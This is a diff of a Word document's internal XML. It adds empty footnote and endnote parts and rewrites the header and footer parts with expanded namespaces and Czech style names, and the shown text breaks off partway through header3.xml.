-      <w:docGrid w:type="default" w:linePitch="360" w:charSpace="0"/>
+      <w:docGrid w:linePitch="360"/>
     </w:sectPr>
   </w:body>
 </w:document>
 </file>
 
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Footer"/>
-      <w:spacing w:before="0" w:after="120"/>
-      <w:rPr/>
-    </w:pPr>
-    <w:r>
-      <w:rPr/>
-    </w:r>
+      <w:pStyle w:val="Zpat"/>
+    </w:pPr>
   </w:p>
 </w:ftr>
 </file>
 
 <file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Footer"/>
-      <w:spacing w:before="0" w:after="120"/>
-      <w:ind w:hanging="0"/>
-      <w:rPr/>
+      <w:pStyle w:val="Zpat"/>
     </w:pPr>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="PageNumber"/>
+        <w:rStyle w:val="slostrnky"/>
       </w:rPr>
       <w:tab/>
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="PageNumber"/>
+        <w:rStyle w:val="slostrnky"/>
       </w:rPr>
       <w:fldChar w:fldCharType="begin"/>
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="PageNumber"/>
+        <w:rStyle w:val="slostrnky"/>
       </w:rPr>
       <w:instrText xml:space="preserve"> PAGE </w:instrText>
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="PageNumber"/>
+        <w:rStyle w:val="slostrnky"/>
       </w:rPr>
       <w:fldChar w:fldCharType="separate"/>
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="PageNumber"/>
+        <w:rStyle w:val="slostrnky"/>
       </w:rPr>
       <w:t>6</w:t>
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="PageNumber"/>
+        <w:rStyle w:val="slostrnky"/>
       </w:rPr>
       <w:fldChar w:fldCharType="end"/>
     </w:r>
@@ -1924,235 +2041,211 @@
 </file>
 
 <file path=word/footer3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Footer"/>
-      <w:spacing w:before="0" w:after="120"/>
-      <w:ind w:hanging="0"/>
-      <w:rPr/>
-    </w:pPr>
-    <w:r>
-      <w:rPr/>
-    </w:r>
+      <w:pStyle w:val="Zpat"/>
+    </w:pPr>
   </w:p>
 </w:ftr>
 </file>
 
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
+</file>
+
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="Normal"/>
-      <w:rPr/>
-    </w:pPr>
-    <w:r>
-      <w:rPr/>
-    </w:r>
-  </w:p>
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="Normal"/>
-      <w:rPr/>
-    </w:pPr>
-    <w:r>
-      <w:rPr/>
-    </w:r>
-  </w:p>
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="Normal"/>
-      <w:widowControl/>
-      <w:bidi w:val="0"/>
-      <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="120"/>
-      <w:ind w:firstLine="720"/>
-      <w:jc w:val="both"/>
-      <w:rPr/>
-    </w:pPr>
-    <w:r>
-      <w:rPr/>
-    </w:r>
-  </w:p>
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:p/>
+  <w:p/>
+  <w:p/>
 </w:hdr>
 </file>
 
 <file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Header"/>
-      <w:spacing w:before="0" w:after="120"/>
-      <w:ind w:hanging="0"/>
-      <w:rPr/>
-    </w:pPr>
-    <w:r>
-      <w:rPr/>
-    </w:r>
+      <w:pStyle w:val="Zhlav"/>
+    </w:pPr>
   </w:p>
 </w:hdr>
 </file>
 
 <file path=word/header3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
